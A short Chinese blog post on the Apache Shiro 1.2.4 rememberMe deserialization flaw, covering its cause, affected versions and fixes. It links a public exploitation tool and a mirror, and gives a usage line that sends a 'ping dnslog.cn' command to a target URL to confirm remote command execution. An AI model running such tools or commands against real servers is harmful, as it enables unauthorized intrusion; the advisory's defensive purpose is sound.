apache shiro 1.2.4反序列化漏洞

–>

Apache Shiro 简介

Apache Shiro 是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

漏洞成因

Apache Shiro 反序列化漏洞的主要成因是 shiro 在进行 remember me 操作时，将用户信息序列化后加密存储在cookie中，当shiro 获取这个cookie进行反序列化操作获取原始用户信息时，没有严格限制反序列化内容，导致了命令执行。

影响版本

Apache Shiro <= 1.2.4

漏洞利用

工具地址：

https://github.com/sv3nbeast/ShiroScan

用法：

usage：python3 shiro.py http://url.com “ping dnslog.cn”

验证推荐使用这个dnslog平台，速度比ceye.io要快很多，在线免登陆生成临时二级子域名，可查询到dns解析记录

http://www.dnslog.cn/

为防止原作者的github链接失效，特地保存一份百度云

链接：https://pan.baidu.com/s/1Giy_1RlE1tmlAuO3yvrGWA

提取码：d37s

解决建议：

1. 升级apache shrio至1.2.4以上版本（不包括1.2.4）。

2. 禁止使用默认key或者网上公开的key，需使用动态认证key。

本文来源 互联网收集，文章内容系作者个人观点，不代表 本站 对观点赞同或支持。如需转载，请注明文章来源,如您发现有涉嫌抄袭侵权的内容，请联系本站核实处理。